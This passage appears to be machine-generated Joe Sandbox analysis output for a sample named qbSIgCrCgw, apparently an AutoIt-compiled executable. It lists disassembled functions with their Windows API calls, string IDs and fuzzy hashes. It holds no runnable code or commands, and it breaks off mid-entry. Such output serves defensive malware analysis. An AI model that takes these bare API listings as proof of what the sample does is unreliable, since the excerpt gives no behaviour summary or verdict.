                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                • Opcode ID: 3d5c23a9035239496ff606ded0f58cb682875f2d346b223a42cd540c99e8cec0
                                                                                • Instruction ID: 22fa240f904c4f21ce1d39a7eb443a7598856c21d9d656fb7e88bf3d19fe4188
                                                                                • Opcode Fuzzy Hash: 3d5c23a9035239496ff606ded0f58cb682875f2d346b223a42cd540c99e8cec0
                                                                                • Instruction Fuzzy Hash: F821F874A00114BFDB06EBA1DC86EFEB7B4EF45300F100215F661972D2DBB99915DB24
                                                                                Function 003EB9F0 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 003EBA73
                                                                                • GetDlgCtrlID.USER32 ref: 003EBA7E
                                                                                • GetParent.USER32 ref: 003EBA9A
                                                                                • SendMessageW.USER32(00000000,?,00000111,?), ref: 003EBA9D
                                                                                • GetDlgCtrlID.USER32(?), ref: 003EBAA6
                                                                                • GetParent.USER32(?), ref: 003EBAC2
                                                                                • SendMessageW.USER32(00000000,?,?,00000111), ref: 003EBAC5
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: MessageSend$CtrlParent
                                                                                • String ID: ComboBox$ListBox
                                                                                • API String ID: 1383977212-1403004172
                                                                                • Opcode ID: 2132ab3e6d62e71d1d35b7c4bd2323940efe472932c3a26cb9da0552d81692b8
                                                                                • Instruction ID: 911b65dca0e5161acccb609ee7ba75711cd2f68441b222efeb99d8f796833067
                                                                                • Opcode Fuzzy Hash: 2132ab3e6d62e71d1d35b7c4bd2323940efe472932c3a26cb9da0552d81692b8
                                                                                • Instruction Fuzzy Hash: CA21CFB4A00108BBDF02ABA4CC86FFEBB79EF45300F100125F561A71D1DBB999199B24
                                                                                Function 003EBAD7 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 71windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetParent.USER32 ref: 003EBAE3
                                                                                • GetClassNameW.USER32(00000000,?,00000100), ref: 003EBAF8
                                                                                • _wcscmp.LIBCMT ref: 003EBB0A
                                                                                • SendMessageW.USER32(00000000,00000111,0000702B,00000000), ref: 003EBB85
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ClassMessageNameParentSend_wcscmp
                                                                                • String ID: SHELLDLL_DefView$details$largeicons$list$smallicons
                                                                                • API String ID: 1704125052-3381328864
                                                                                • Opcode ID: 4511035f383ddc6f0099db757414a0336544b40cc1b08c19fac6b3358054d599
                                                                                • Instruction ID: 4b8cc732f556cc8c59b44183c19adc0a4a7a2f0620fd0c40ebea3709735f9dd4
                                                                                • Opcode Fuzzy Hash: 4511035f383ddc6f0099db757414a0336544b40cc1b08c19fac6b3358054d599
                                                                                • Instruction Fuzzy Hash: E3112376608363FAFA276621AC07EA7B79C9B11B24F300223F904E41D5FBE5A8104518
                                                                                Function 0040B2A9 Relevance: 15.3, APIs: 10, Instructions: 324fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • VariantInit.OLEAUT32(?), ref: 0040B2D5
                                                                                • CoInitialize.OLE32(00000000), ref: 0040B302
                                                                                • CoUninitialize.OLE32 ref: 0040B30C
                                                                                • GetRunningObjectTable.OLE32(00000000,?), ref: 0040B40C
                                                                                • SetErrorMode.KERNEL32(00000001,00000029), ref: 0040B539
                                                                                • CoGetInstanceFromFile.OLE32(00000000,?,00000000,00000015,00000002), ref: 0040B56D
                                                                                • CoGetObject.OLE32(?,00000000,0043D91C,?), ref: 0040B590
                                                                                • SetErrorMode.KERNEL32(00000000), ref: 0040B5A3
                                                                                • SetErrorMode.KERNEL32(00000000,00000000,00000000,00000000,00000000), ref: 0040B623
                                                                                • VariantClear.OLEAUT32(0043D91C), ref: 0040B633
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: ErrorMode$ObjectVariant$ClearFileFromInitInitializeInstanceRunningTableUninitialize
                                                                                • String ID:
                                                                                • API String ID: 2395222682-0
                                                                                • Opcode ID: cd70ba3179e5066636f0380985f022e578de33b66cbd94e622ff4072a3d36978
                                                                                • Instruction ID: b5e6660e3686ba7d086da5b434e0344c70329e6f3a021bfd8ce7718eb46016a9
                                                                                • Opcode Fuzzy Hash: cd70ba3179e5066636f0380985f022e578de33b66cbd94e622ff4072a3d36978
                                                                                • Instruction Fuzzy Hash: FAC12771604301AFC700DF64C884A6BB7E9FF88308F10496EF989AB291D775ED05CB9A
                                                                                Function 003DACB3 Relevance: 15.2, APIs: 10, Instructions: 219COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • __lock.LIBCMT ref: 003DACC1
                                                                                  • Part of subcall function 003D7CF4: __mtinitlocknum.LIBCMT ref: 003D7D06
                                                                                  • Part of subcall function 003D7CF4: EnterCriticalSection.KERNEL32(00000000,?,003D7ADD,0000000D), ref: 003D7D1F
                                                                                • __calloc_crt.LIBCMT ref: 003DACD2
                                                                                  • Part of subcall function 003D6986: __calloc_impl.LIBCMT ref: 003D6995
                                                                                  • Part of subcall function 003D6986: Sleep.KERNEL32(00000000,000003BC,003CF507,?,0000000E), ref: 003D69AC
                                                                                • @_EH4_CallFilterFunc@8.LIBCMT ref: 003DACED
                                                                                • GetStartupInfoW.KERNEL32(?,00466E28,00000064,003D5E91,00466C70,00000014), ref: 003DAD46
                                                                                • __calloc_crt.LIBCMT ref: 003DAD91
                                                                                • GetFileType.KERNEL32(00000001), ref: 003DADD8
                                                                                • InitializeCriticalSectionAndSpinCount.KERNEL32(0000000D,00000FA0), ref: 003DAE11
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: CriticalSection__calloc_crt$CallCountEnterFileFilterFunc@8InfoInitializeSleepSpinStartupType__calloc_impl__lock__mtinitlocknum
                                                                                • String ID:
                                                                                • API String ID: 1426640281-0
                                                                                • Opcode ID: e3b27981a05f48403500798f2469538bc12b51070b354ea8601203ba5fe3b3cb
                                                                                • Instruction ID: bfe286391206bf3a08624e3a8854c5ddb480f3cc1018421dc6b982ed26292a4c
                                                                                • Opcode Fuzzy Hash: e3b27981a05f48403500798f2469538bc12b51070b354ea8601203ba5fe3b3cb
                                                                                • Instruction Fuzzy Hash: 5981F6B2D05B418FDB15CF68E9405ADBBF4AF05320B24426EE4A6AB3D1D7349843CB56
                                                                                Function 003F4025 Relevance: 15.1, APIs: 10, Instructions: 88threadCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetCurrentThreadId.KERNEL32 ref: 003F4047
                                                                                • GetForegroundWindow.USER32(00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F405B
                                                                                • GetWindowThreadProcessId.USER32(00000000), ref: 003F4062
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F30A5,?,00000001), ref: 003F4071
                                                                                • GetWindowThreadProcessId.USER32(?,00000000), ref: 003F4083
                                                                                • AttachThreadInput.USER32(?,00000000,00000001,?,?,?,?,?,003F30A5,?,00000001), ref: 003F409C
                                                                                • AttachThreadInput.USER32(00000000,00000000,00000001,?,?,?,?,?,003F30A5,?,00000001), ref: 003F40AE
                                                                                • AttachThreadInput.USER32(00000000,00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F40F3
                                                                                • AttachThreadInput.USER32(?,?,00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F4108
                                                                                • AttachThreadInput.USER32(00000000,?,00000000,?,?,?,?,?,003F30A5,?,00000001), ref: 003F4113
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Thread$AttachInput$Window$Process$CurrentForeground
                                                                                • String ID:
                                                                                • API String ID: 2156557900-0
                                                                                • Opcode ID: dafdab8fca87c685559fade17b58693590c4f4398b3032fb65512381e59d4faf
                                                                                • Instruction ID: 2d877616e34d210773176ddc38cc71cb577623786b30946bc0cfabb8f8d80147
                                                                                • Opcode Fuzzy Hash: dafdab8fca87c685559fade17b58693590c4f4398b3032fb65512381e59d4faf
                                                                                • Instruction Fuzzy Hash: 3531B972500209AFEB12DF64EC46B7A77BDFB94312F118125FA09D6260DB74DD808B59
                                                                                Function 0042DD4A Relevance: 15.1, APIs: 10, Instructions: 59windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetSysColor.USER32(00000008), ref: 003CB496
                                                                                • SetTextColor.GDI32(?,000000FF), ref: 003CB4A0
                                                                                • SetBkMode.GDI32(?,00000001), ref: 003CB4B5
                                                                                • GetStockObject.GDI32(00000005), ref: 003CB4BD
                                                                                • GetClientRect.USER32(?), ref: 0042DD63
                                                                                • SendMessageW.USER32(?,00001328,00000000,?), ref: 0042DD7A
                                                                                • GetWindowDC.USER32(?), ref: 0042DD86
                                                                                • GetPixel.GDI32(00000000,?,?), ref: 0042DD95
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0042DDA7
                                                                                • GetSysColor.USER32(00000005), ref: 0042DDC5
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Color$ClientMessageModeObjectPixelRectReleaseSendStockTextWindow
                                                                                • String ID:
                                                                                • API String ID: 3430376129-0
                                                                                • Opcode ID: 89c9556869324589ffbd7e1c135e7055501e646552ee19d0f19fbfc258a6adbb
                                                                                • Instruction ID: 87cc56cd637d11fb832429aa3375c0be90f7d6b9d1261c5764c693aa116f8358
                                                                                • Opcode Fuzzy Hash: 89c9556869324589ffbd7e1c135e7055501e646552ee19d0f19fbfc258a6adbb
                                                                                • Instruction Fuzzy Hash: 9A114931900605FFDB216FB4FC0AFA97B75EB08325F118635FA66950E2CB324951EB25
                                                                                Function 003B3093 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 210COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • mciSendStringW.WINMM(close all,00000000,00000000,00000000), ref: 003B30DC
                                                                                • CoUninitialize.OLE32(?,00000000), ref: 003B3181
                                                                                • UnregisterHotKey.USER32(?), ref: 003B32A9
                                                                                • DestroyWindow.USER32(?), ref: 00425079
                                                                                • FreeLibrary.KERNEL32(?), ref: 004250F8
                                                                                • VirtualFree.KERNEL32(?,00000000,00008000), ref: 00425125
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
                                                                                • String ID: close all
                                                                                • API String ID: 469580280-3243417748
                                                                                • Opcode ID: 079ad37f184ac8837c92ad27381510298a9346d848567d9ef9817381ad95377d
                                                                                • Instruction ID: a2971bb788c40f37194ee73233535a8b728611a1ee1fa18b92764db094f4887a
                                                                                • Opcode Fuzzy Hash: 079ad37f184ac8837c92ad27381510298a9346d848567d9ef9817381ad95377d
                                                                                • Instruction Fuzzy Hash: B9913E347001268FC716EF14D895BA9F3B4FF05308F5482A9E60AAB662DF34AE56CF54
                                                                                Function 003CCB8D Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 185windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • SetWindowLongW.USER32(?,000000EB), ref: 003CCC15
                                                                                  • Part of subcall function 003CCCCD: GetClientRect.USER32(?,?), ref: 003CCCF6
                                                                                  • Part of subcall function 003CCCCD: GetWindowRect.USER32(?,?), ref: 003CCD37
                                                                                  • Part of subcall function 003CCCCD: ScreenToClient.USER32(?,?), ref: 003CCD5F
                                                                                • GetDC.USER32 ref: 0042D137
                                                                                • SendMessageW.USER32(?,00000031,00000000,00000000), ref: 0042D14A
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042D158
                                                                                • SelectObject.GDI32(00000000,00000000), ref: 0042D16D
                                                                                • ReleaseDC.USER32(?,00000000), ref: 0042D175
                                                                                • MoveWindow.USER32(?,?,?,?,?,?,?,00000031,00000000,00000000), ref: 0042D200
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Window$ClientObjectRectSelect$LongMessageMoveReleaseScreenSend
                                                                                • String ID: U
                                                                                • API String ID: 4009187628-3372436214
                                                                                • Opcode ID: ae0d926fc899c3686083b983ecf1f7d4d0a22038d04da7f30f9d6199085c1d72
                                                                                • Instruction ID: 64a8b6fd0ae75d765200dddea9a3787a967d93877420b386daa300119e8f576a
                                                                                • Opcode Fuzzy Hash: ae0d926fc899c3686083b983ecf1f7d4d0a22038d04da7f30f9d6199085c1d72
                                                                                • Instruction Fuzzy Hash: C071E330A00205DFCF228F64D881EFA7BB5FF48314F14826AED599A2A5C7358C91DB58
                                                                                Function 0041ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 003CB34E: GetWindowLongW.USER32(?,000000EB), ref: 003CB35F
                                                                                  • Part of subcall function 003CB63C: GetCursorPos.USER32(000000FF), ref: 003CB64F
                                                                                  • Part of subcall function 003CB63C: ScreenToClient.USER32(00000000,000000FF), ref: 003CB66C
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000001), ref: 003CB691
                                                                                  • Part of subcall function 003CB63C: GetAsyncKeyState.USER32(00000002), ref: 003CB69F
                                                                                • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0041ED3C
                                                                                • ImageList_EndDrag.COMCTL32 ref: 0041ED42
                                                                                • ReleaseCapture.USER32 ref: 0041ED48
                                                                                • SetWindowTextW.USER32(?,00000000), ref: 0041EDF0
                                                                                • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0041EE03
                                                                                • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0041EEDC
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                • API String ID: 1924731296-2107944366
                                                                                • Opcode ID: 7bfa04e3a2be68fe7d90b262e4496e95db38e81055173ba2d37704a9b7b5a0e9
                                                                                • Instruction ID: c451798a4219f8be7a6393ce60cfa11863c8802f4439cbadae369bc09c8cdf65
                                                                                • Opcode Fuzzy Hash: 7bfa04e3a2be68fe7d90b262e4496e95db38e81055173ba2d37704a9b7b5a0e9
                                                                                • Instruction Fuzzy Hash: 7C51BC74204300AFD710DF24DC86FAA77E4FB88718F00492EFA959B2E2DB749994CB56
                                                                                Function 004045C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004045FF
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0040462B
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0040466D
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00404682
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0040468F
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 004046BF
                                                                                • InternetCloseHandle.WININET(00000000), ref: 00404706
                                                                                  • Part of subcall function 00405052: GetLastError.KERNEL32(?,?,004043CC,00000000,00000000,00000001), ref: 00405067
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                                                • String ID:
                                                                                • API String ID: 1241431887-3916222277
                                                                                • Opcode ID: 9863f11838522a1ae4668c29b586e97b69775b9dadb95726d1626c5bc450d1f7
                                                                                • Instruction ID: b410a0adf492bc40c7f6387f8e996218b44ffa30ebedeffad5e0463a1eca5117
                                                                                • Opcode Fuzzy Hash: 9863f11838522a1ae4668c29b586e97b69775b9dadb95726d1626c5bc450d1f7
                                                                                • Instruction Fuzzy Hash: 484180B1500204BFEB019F50DC85FBB77ACEF49314F00413AFA05AA281E77999449BA8
                                                                                Function 0040B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0044DC00), ref: 0040B715
                                                                                • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0044DC00), ref: 0040B749
                                                                                • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0040B8C1
                                                                                • SysFreeString.OLEAUT32(?), ref: 0040B8EB
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                                                • String ID:
                                                                                • API String ID: 560350794-0
                                                                                • Opcode ID: c473c18a7c62e9aaf371f96c79c32cb35961d6a859a7de3621ea967f9ebc86f6
                                                                                • Instruction ID: 076c5cd2f72584d6c35c609aa6f2caf46acef277c8f583e8eae4ae2a9943c19c
                                                                                • Opcode Fuzzy Hash: c473c18a7c62e9aaf371f96c79c32cb35961d6a859a7de3621ea967f9ebc86f6
                                                                                • Instruction Fuzzy Hash: 9AF13D75A00209EFCF04DF94C888EAEB7B9FF49315F148469F915AB290DB35AD42CB94
                                                                                Function 004124D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • _memset.LIBCMT ref: 004124F5
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00412688
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004126AC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004126EC
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0041270E
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0041286F
                                                                                • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 004128A1
                                                                                • CloseHandle.KERNEL32(?), ref: 004128D0
                                                                                • CloseHandle.KERNEL32(?), ref: 00412947
                                                                                Memory Dump Source
                                                                                • Source File: 00000000.00000002.1444097488.00000000003B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 003B0000, based on PE: true
                                                                                • Associated: 00000000.00000002.1444075603.00000000003B0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000043D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444320779.000000000045E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444400158.000000000046A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                • Associated: 00000000.00000002.1444508328.0000000000474000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_3b0000_qbSIgCrCgw.jbxd
                                                                                Similarity
                                                                                • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                                                • String ID:
                                                                                • API String ID: 4090791747-0
                                                                                • Opcode ID: f35178a311412a5a753ec0fa43e26a4d2a9493f6fc9a074d687116fff6027827
                                                                                • Instruction ID: a988ef0b39ac05ec8586e7df10c0ec0fac4c296e99a684f535e3a003707e6906
                                                                                • Opcode Fuzzy Hash: f35178a311412a5a753ec0fa43e26a4d2a9493f6fc9a074d687116fff6027827
                                                                                • Instruction Fuzzy Hash: 6CD1DF31604200DFCB15EF24C991BAABBE1AF84314F18855EF9999F3A2DB74DC90CB56
                                                                                Function 0041B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                                                Download Yara Rule
                                                                                APIs
